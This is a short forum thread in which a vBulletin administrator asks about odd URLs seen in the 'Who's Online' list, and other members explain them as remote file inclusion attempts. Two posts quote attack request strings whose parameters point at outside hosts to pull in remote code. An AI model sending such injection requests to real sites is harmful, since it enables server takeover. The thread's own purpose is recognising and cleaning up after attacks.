Announcement

Collapse
No announcement yet.

User viewing strange location

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • User viewing strange location

    I was just viewing my Who's Online list and there was a guest user viewing the file location:

    /kmitaadmin/kmitat/htmlcode.php?file=http://qsystemsonline.biz/riCo??

    As far as I'm aware, that location doesn't exist on my server. So I looked it up on the internet, and a couple of sites that relate to it came up:

    http://www.securityfocus.com/archive/1/491616
    http://www.milw0rm.com/exploits/5544

    But unfortunately, I have no idea what any of that means, so I wondered if anyone else had ever seen this on their forum, as to be honest it looks really suspicious. The IP address just goes to a blank page, and is registered to a hosting company.

    The only hacks I have installed are one for putting a cookie on a user's PC so they can't register twice (I forget the name), and vbadvanced. It's vbulletin 3.6.8.

  • #2
    That looks like a random attempt at URL injection. These are not uncommon. Basically some one is blindly trying to exploit your site. vBulletin is coded securely such that this kind of exploit doesn't work.

    Comment


    • #3
      Okay thanks.

      I've got another one just now viewing here:

      /impex/ImpExDisplay.php?systempath=http://www.trosken.com/test.txt?

      Should I presume that is the same?

      Comment


      • #4
        That looks the same. If you aren't using the ImpEx files anymore then you can delete them.

        Comment

        widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
        Working...
        X